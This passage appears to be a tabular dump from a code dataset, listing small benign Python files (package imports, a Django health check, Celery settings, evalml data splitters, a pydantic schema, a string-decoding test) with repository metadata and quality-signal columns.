hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
254d3022845aae3d1a9293a0181f060be7c09b6f
| 28
|
py
|
Python
|
pyqt/utils/__init__.py
|
TaoYang526/qt
|
81ed776c67f2df0d07d8b7e964e6a25b9271b28b
|
[
"Apache-2.0"
] | null | null | null |
pyqt/utils/__init__.py
|
TaoYang526/qt
|
81ed776c67f2df0d07d8b7e964e6a25b9271b28b
|
[
"Apache-2.0"
] | null | null | null |
pyqt/utils/__init__.py
|
TaoYang526/qt
|
81ed776c67f2df0d07d8b7e964e6a25b9271b28b
|
[
"Apache-2.0"
] | null | null | null |
from pyqt.utils import time
| 14
| 27
| 0.821429
| 5
| 28
| 4.6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 28
| 1
| 28
| 28
| 0.958333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c276e6f457a794f0b9dc50d4ef823c9392fe5335
| 62
|
py
|
Python
|
src/lk_db/ents/time/EntTime.py
|
nuuuwan/lk_db
|
ac0abfa47ba31b0d4c2c8566b3101b83749bd45d
|
[
"MIT"
] | null | null | null |
src/lk_db/ents/time/EntTime.py
|
nuuuwan/lk_db
|
ac0abfa47ba31b0d4c2c8566b3101b83749bd45d
|
[
"MIT"
] | null | null | null |
src/lk_db/ents/time/EntTime.py
|
nuuuwan/lk_db
|
ac0abfa47ba31b0d4c2c8566b3101b83749bd45d
|
[
"MIT"
] | null | null | null |
from lk_db.ents.Ent import Ent
class EntTime(Ent):
pass
| 10.333333
| 30
| 0.709677
| 11
| 62
| 3.909091
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.209677
| 62
| 5
| 31
| 12.4
| 0.877551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
c2ad28eb7943b8ab5d743641a4bd509bff412fa2
| 4,807
|
py
|
Python
|
evalml/preprocessing/data_splitters/balanced_classification_splitter.py
|
skvorekn/evalml
|
2cbfa344ec3fdc0fb0f4a0f1093811135b9b97d8
|
[
"BSD-3-Clause"
] | null | null | null |
evalml/preprocessing/data_splitters/balanced_classification_splitter.py
|
skvorekn/evalml
|
2cbfa344ec3fdc0fb0f4a0f1093811135b9b97d8
|
[
"BSD-3-Clause"
] | null | null | null |
evalml/preprocessing/data_splitters/balanced_classification_splitter.py
|
skvorekn/evalml
|
2cbfa344ec3fdc0fb0f4a0f1093811135b9b97d8
|
[
"BSD-3-Clause"
] | null | null | null |
from sklearn.model_selection import StratifiedKFold
from evalml.preprocessing.data_splitters.balanced_classification_sampler import (
BalancedClassificationSampler
)
from evalml.preprocessing.data_splitters.base_splitters import (
BaseUnderSamplingSplitter
)
from evalml.preprocessing.data_splitters.training_validation_split import (
TrainingValidationSplit
)
class BalancedClassificationDataTVSplit(BaseUnderSamplingSplitter):
"""Data splitter for generating training and validation split using Balanced Classification Data Sampler."""
def __init__(self, balanced_ratio=4, min_samples=100, min_percentage=0.1, test_size=0.25, shuffle=True, random_seed=0):
"""Create Balanced Classification Data TV splitter
Arguments:
balanced_ratio (float): The largest majority:minority ratio that is accepted as 'balanced'. For instance, a 4:1 ratio would be
represented as 4, while a 6:5 ratio is 1.2. Must be greater than or equal to 1 (or 1:1). Defaults to 4.
min_samples (int): The minimum number of samples that we must have for any class, pre or post sampling. If a class must be downsampled, it will not be downsampled past this value.
To determine severe imbalance, the minority class must occur less often than this and must have a class ratio below min_percentage.
Must be greater than 0. Defaults to 100.
min_percentage (float): The minimum percentage of the minimum class to total dataset that we tolerate, as long as it is above min_samples.
If min_percentage and min_samples are not met, treat this as severely imbalanced, and we will not resample the data.
Must be between 0 and 0.5, inclusive. Defaults to 0.1.
test_size (float): The size of the test split. Defaults to 0.25.
shuffle (bool): Whether or not to shuffle the data before splitting. Defaults to True.
random_seed (int): The seed to use for random sampling. Defaults to 0.
"""
self.sampler = BalancedClassificationSampler(balanced_ratio=balanced_ratio, min_samples=min_samples, min_percentage=min_percentage, random_seed=random_seed)
super().__init__(sampler=self.sampler, n_splits=1, random_seed=random_seed)
self.shuffle = shuffle
self.test_size = test_size
self.balanced_ratio = balanced_ratio
self.min_samples = min_samples
self.min_percentage = min_percentage
self.splitter = TrainingValidationSplit(test_size=test_size, shuffle=shuffle, random_seed=random_seed)
class BalancedClassificationDataCVSplit(BaseUnderSamplingSplitter):
"""Data splitter for generating k-fold cross-validation split using Balanced Classification Data Sampler."""
def __init__(self, balanced_ratio=4, min_samples=100, min_percentage=0.1, n_splits=3, shuffle=True, random_seed=0):
"""Create Balanced Classification Data CV splitter
Arguments:
balanced_ratio (float): The largest majority:minority ratio that is accepted as 'balanced'. For instance, a 4:1 ratio would be
represented as 4, while a 6:5 ratio is 1.2. Must be greater than or equal to 1 (or 1:1). Defaults to 4.
min_samples (int): The minimum number of samples that we must have for any class, pre or post sampling. If a class must be downsampled, it will not be downsampled past this value.
To determine severe imbalance, the minority class must occur less often than this and must have a class ratio below min_percentage.
Must be greater than 0. Defaults to 100.
min_percentage (float): The minimum percentage of the minimum class to total dataset that we tolerate, as long as it is above min_samples.
If min_percentage and min_samples are not met, treat this as severely imbalanced, and we will not resample the data.
Must be between 0 and 0.5, inclusive. Defaults to 0.1.
n_splits (int): The number of splits to use for cross validation. Defaults to 3.
shuffle (bool): Whether or not to shuffle the data before splitting. Defaults to True.
random_seed (int): The seed to use for random sampling. Defaults to 0.
"""
self.sampler = BalancedClassificationSampler(balanced_ratio=balanced_ratio, min_samples=min_samples, min_percentage=min_percentage, random_seed=random_seed)
super().__init__(sampler=self.sampler, n_splits=n_splits, random_seed=random_seed)
self.shuffle = shuffle
self.balanced_ratio = balanced_ratio
self.min_samples = min_samples
self.min_percentage = min_percentage
self.splitter = StratifiedKFold(n_splits=n_splits, shuffle=shuffle, random_state=random_seed)
| 60.848101
| 191
| 0.725817
| 669
| 4,807
| 5.068759
| 0.188341
| 0.047184
| 0.023002
| 0.02949
| 0.824536
| 0.763197
| 0.763197
| 0.763197
| 0.739605
| 0.707756
| 0
| 0.017246
| 0.215935
| 4,807
| 78
| 192
| 61.628205
| 0.882462
| 0.564801
| 0
| 0.344828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.137931
| 0
| 0.275862
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c2bc8e02528d8ad4917cf1b72be4033e672be9ac
| 31
|
py
|
Python
|
model/mscff/__init__.py
|
LK-Peng/CNN-based-Cloud-Detection-Methods
|
1393a6886e62f1ed5a612d57c5a725c763a6b2cc
|
[
"MIT"
] | 2
|
2022-02-16T03:30:19.000Z
|
2022-03-18T08:02:39.000Z
|
model/mscff/__init__.py
|
LK-Peng/CNN-based-Cloud-Detection-Methods
|
1393a6886e62f1ed5a612d57c5a725c763a6b2cc
|
[
"MIT"
] | null | null | null |
model/mscff/__init__.py
|
LK-Peng/CNN-based-Cloud-Detection-Methods
|
1393a6886e62f1ed5a612d57c5a725c763a6b2cc
|
[
"MIT"
] | 1
|
2022-02-16T03:30:20.000Z
|
2022-02-16T03:30:20.000Z
|
from .mscff_model import MSCFF
| 15.5
| 30
| 0.83871
| 5
| 31
| 5
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 31
| 1
| 31
| 31
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c2bd7d19cb0b1997605bb2bf0b20e39d01a29860
| 96
|
py
|
Python
|
netensorflow/ann/macro_layer/layer_structure/__init__.py
|
psigelo/NeTensorflow
|
ec8bc09cc98346484d1b682a3dfd25c68c4ded61
|
[
"MIT"
] | null | null | null |
netensorflow/ann/macro_layer/layer_structure/__init__.py
|
psigelo/NeTensorflow
|
ec8bc09cc98346484d1b682a3dfd25c68c4ded61
|
[
"MIT"
] | null | null | null |
netensorflow/ann/macro_layer/layer_structure/__init__.py
|
psigelo/NeTensorflow
|
ec8bc09cc98346484d1b682a3dfd25c68c4ded61
|
[
"MIT"
] | null | null | null |
from .InputLayerStructure import InputLayerStructure
from .LayerStructure import LayerStructure
| 32
| 52
| 0.895833
| 8
| 96
| 10.75
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 96
| 2
| 53
| 48
| 0.977273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6c3ba5d9b3babe444d2c4d3c2e6c46f0cd91ef11
| 27
|
py
|
Python
|
ep_ws/devel/lib/python3/dist-packages/realsense2_camera/srv/__init__.py
|
fsrlab/FSR_ROS_SIM
|
f22dfbd19ca1f2f1c7456fc51fb382509f9d7c62
|
[
"MIT"
] | null | null | null |
ep_ws/devel/lib/python3/dist-packages/realsense2_camera/srv/__init__.py
|
fsrlab/FSR_ROS_SIM
|
f22dfbd19ca1f2f1c7456fc51fb382509f9d7c62
|
[
"MIT"
] | null | null | null |
ep_ws/devel/lib/python3/dist-packages/realsense2_camera/srv/__init__.py
|
fsrlab/FSR_ROS_SIM
|
f22dfbd19ca1f2f1c7456fc51fb382509f9d7c62
|
[
"MIT"
] | null | null | null |
from ._DeviceInfo import *
| 13.5
| 26
| 0.777778
| 3
| 27
| 6.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 27
| 1
| 27
| 27
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6c63b62274efc319d7d5ff5ab63d36ad70596229
| 240
|
py
|
Python
|
stacks/tests/test_decode_string.py
|
ahcode0919/python-ds-algorithms
|
0d617b78c50b6c18da40d9fa101438749bfc82e1
|
[
"MIT"
] | null | null | null |
stacks/tests/test_decode_string.py
|
ahcode0919/python-ds-algorithms
|
0d617b78c50b6c18da40d9fa101438749bfc82e1
|
[
"MIT"
] | null | null | null |
stacks/tests/test_decode_string.py
|
ahcode0919/python-ds-algorithms
|
0d617b78c50b6c18da40d9fa101438749bfc82e1
|
[
"MIT"
] | 3
|
2020-10-07T20:24:45.000Z
|
2020-12-16T04:53:19.000Z
|
from stacks.decode_string import decode_string
def test_decode_string():
assert decode_string("3[a]2[bc]") == "aaabcbc"
assert decode_string("3[a2[c]]") == "accaccacc"
assert decode_string("2[abc]3[cd]ef") == "abcabccdcdcdef"
| 30
| 61
| 0.7
| 35
| 240
| 4.6
| 0.571429
| 0.447205
| 0.335404
| 0.236025
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028846
| 0.133333
| 240
| 7
| 62
| 34.285714
| 0.745192
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0.2
| true
| 0
| 0.2
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
66849fe8ffb1c558532c4307c57805110b8abc4c
| 134
|
py
|
Python
|
app/config/task.py
|
atulmishra-one/dairy_management_portal
|
a07320dc0f4419d4c78f7d2453c63b1c9544aba8
|
[
"MIT"
] | 2
|
2020-08-02T10:06:19.000Z
|
2022-03-29T06:10:57.000Z
|
app/config/task.py
|
atulmishra-one/dairy_management_portal
|
a07320dc0f4419d4c78f7d2453c63b1c9544aba8
|
[
"MIT"
] | null | null | null |
app/config/task.py
|
atulmishra-one/dairy_management_portal
|
a07320dc0f4419d4c78f7d2453c63b1c9544aba8
|
[
"MIT"
] | 2
|
2019-02-03T15:44:02.000Z
|
2021-03-09T07:30:28.000Z
|
CELERY_BROKER_URL = 'redis://localhost:6379/0'
CELERY_RESULT_BACKEND = 'redis://localhost:6379/0'
CELERY_IMPORTS=('app.users.tasks')
| 26.8
| 50
| 0.768657
| 19
| 134
| 5.157895
| 0.684211
| 0.285714
| 0.367347
| 0.387755
| 0.510204
| 0
| 0
| 0
| 0
| 0
| 0
| 0.079365
| 0.059701
| 134
| 5
| 51
| 26.8
| 0.698413
| 0
| 0
| 0
| 0
| 0
| 0.466667
| 0.355556
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
66a65924a1e2768d7469c1f8356205da9b3cbe9a
| 89
|
py
|
Python
|
project/healthcheck.py
|
permallotment/allotment3
|
0eb390086cc8f48ba6817541c6c70c06dfc83058
|
[
"CC0-1.0"
] | null | null | null |
project/healthcheck.py
|
permallotment/allotment3
|
0eb390086cc8f48ba6817541c6c70c06dfc83058
|
[
"CC0-1.0"
] | null | null | null |
project/healthcheck.py
|
permallotment/allotment3
|
0eb390086cc8f48ba6817541c6c70c06dfc83058
|
[
"CC0-1.0"
] | null | null | null |
from django.http import HttpResponse
def health(request):
return HttpResponse("OK")
| 17.8
| 36
| 0.764045
| 11
| 89
| 6.181818
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146067
| 89
| 4
| 37
| 22.25
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0.022472
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
dd07924629dd0724abf147fb5de6f38d430e1d51
| 136
|
py
|
Python
|
ui/widgets/histogram/__init__.py
|
berendkleinhaneveld/Registrationshop
|
0d6f3ee5324865cdcb419369139f37c39dfe9a1c
|
[
"MIT"
] | 25
|
2015-11-08T16:36:54.000Z
|
2022-01-20T16:03:28.000Z
|
ui/widgets/histogram/__init__.py
|
berendkleinhaneveld/Registrationshop
|
0d6f3ee5324865cdcb419369139f37c39dfe9a1c
|
[
"MIT"
] | 2
|
2016-12-01T23:13:08.000Z
|
2017-07-25T02:40:49.000Z
|
ui/widgets/histogram/__init__.py
|
berendkleinhaneveld/Registrationshop
|
0d6f3ee5324865cdcb419369139f37c39dfe9a1c
|
[
"MIT"
] | 10
|
2016-07-05T14:39:16.000Z
|
2022-01-01T02:05:55.000Z
|
from Histogram import Histogram
from HistogramWidget import HistogramWidget
from TrackingHistogramWidget import TrackingHistogramWidget
| 34
| 59
| 0.911765
| 12
| 136
| 10.333333
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 136
| 3
| 60
| 45.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
dd19eb06c6b535902edc1e166510cf7dc3e3ac06
| 425
|
py
|
Python
|
src/aequitas/plot/__init__.py
|
antoinelb/aequitas
|
5a912a3c1751b04c8688ad9e0c09ed87a6c48870
|
[
"MIT"
] | 469
|
2018-04-24T23:11:45.000Z
|
2022-03-29T07:54:07.000Z
|
src/aequitas/plot/__init__.py
|
antoinelb/aequitas
|
5a912a3c1751b04c8688ad9e0c09ed87a6c48870
|
[
"MIT"
] | 62
|
2018-04-16T00:14:56.000Z
|
2021-11-12T10:35:01.000Z
|
src/aequitas/plot/__init__.py
|
antoinelb/aequitas
|
5a912a3c1751b04c8688ad9e0c09ed87a6c48870
|
[
"MIT"
] | 94
|
2018-05-21T16:13:57.000Z
|
2022-03-25T20:07:25.000Z
|
from aequitas.plot.summary_chart import plot_summary_chart as summary
from aequitas.plot.bubble_disparity_chart import plot_disparity_bubble_chart as disparity
from aequitas.plot.bubble_metric_chart import plot_metric_bubble_chart as absolute
from aequitas.plot.bubble_concatenation_chart import plot_concatenated_bubble_charts as disparity_absolute
from aequitas.plot.xy_metrics_chart import plot_xy_metrics_chart as scatter
| 85
| 106
| 0.908235
| 64
| 425
| 5.65625
| 0.265625
| 0.165746
| 0.220994
| 0.18232
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068235
| 425
| 5
| 107
| 85
| 0.914141
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
dd9d9e745268a05b2a5397b1a32f3f6189d22b3b
| 41
|
py
|
Python
|
ppq/utils/__init__.py
|
openppl-public/ppq
|
0fdea7d4982bc57feb6bb8548c7f012707fbd607
|
[
"Apache-2.0"
] | 100
|
2021-12-31T09:34:06.000Z
|
2022-03-25T02:54:51.000Z
|
ppq/utils/__init__.py
|
openppl-public/ppq
|
0fdea7d4982bc57feb6bb8548c7f012707fbd607
|
[
"Apache-2.0"
] | 12
|
2021-12-31T10:28:15.000Z
|
2022-03-31T07:08:44.000Z
|
ppq/utils/__init__.py
|
openppl-public/ppq
|
0fdea7d4982bc57feb6bb8548c7f012707fbd607
|
[
"Apache-2.0"
] | 21
|
2021-12-31T09:51:02.000Z
|
2022-03-30T12:21:55.000Z
|
from .attribute import process_attribute
| 20.5
| 40
| 0.878049
| 5
| 41
| 7
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097561
| 41
| 1
| 41
| 41
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6620a1da84d2b9ed5781d255a6553d73c0a0fa9e
| 186
|
py
|
Python
|
backend/users/schema.py
|
DDoS000/Event_Registers
|
84a77d0914333ee830a72e2d31fa5374f70dea35
|
[
"MIT"
] | null | null | null |
backend/users/schema.py
|
DDoS000/Event_Registers
|
84a77d0914333ee830a72e2d31fa5374f70dea35
|
[
"MIT"
] | null | null | null |
backend/users/schema.py
|
DDoS000/Event_Registers
|
84a77d0914333ee830a72e2d31fa5374f70dea35
|
[
"MIT"
] | null | null | null |
from pydantic import BaseModel
class UserUpdate(BaseModel):
fullname: str
class ChangePassword(BaseModel):
current_password: str
new_password: str
confirm_password: str
| 20.666667
| 32
| 0.768817
| 21
| 186
| 6.666667
| 0.619048
| 0.235714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177419
| 186
| 9
| 33
| 20.666667
| 0.915033
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.571429
| 0.142857
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
662b2a0d020eee523039d18045fe01c4d90be8ba
| 61
|
py
|
Python
|
psi/serialize/__init__.py
|
delta-mpc/python-psi
|
1665de12a713b37abd889268c66de84cddb1bf84
|
[
"Apache-2.0"
] | 35
|
2021-05-28T10:03:09.000Z
|
2022-03-24T12:08:19.000Z
|
psi/serialize/__init__.py
|
delta-mpc/python-psi
|
1665de12a713b37abd889268c66de84cddb1bf84
|
[
"Apache-2.0"
] | 9
|
2021-07-15T09:16:34.000Z
|
2022-03-31T03:59:16.000Z
|
psi/serialize/__init__.py
|
delta-mpc/python-psi
|
1665de12a713b37abd889268c66de84cddb1bf84
|
[
"Apache-2.0"
] | 16
|
2021-06-18T02:18:56.000Z
|
2022-03-25T02:43:48.000Z
|
from .bit_arr import *
from .ecc import *
from .int import *
| 15.25
| 22
| 0.704918
| 10
| 61
| 4.2
| 0.6
| 0.47619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.196721
| 61
| 3
| 23
| 20.333333
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
664d6f4bea48853ff584b2801386ca40d6d04218
| 35
|
py
|
Python
|
DeepChecker/__init__.py
|
Fixy-TR/DeepChecker
|
99bf6e133890aa44711536723ad9acf16314830d
|
[
"MIT"
] | 21
|
2020-08-05T20:52:35.000Z
|
